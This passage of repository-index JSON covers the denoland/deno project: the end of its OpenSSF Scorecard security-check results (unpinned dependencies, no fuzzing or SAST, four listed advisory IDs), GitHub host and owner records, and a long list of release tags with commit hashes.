https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at"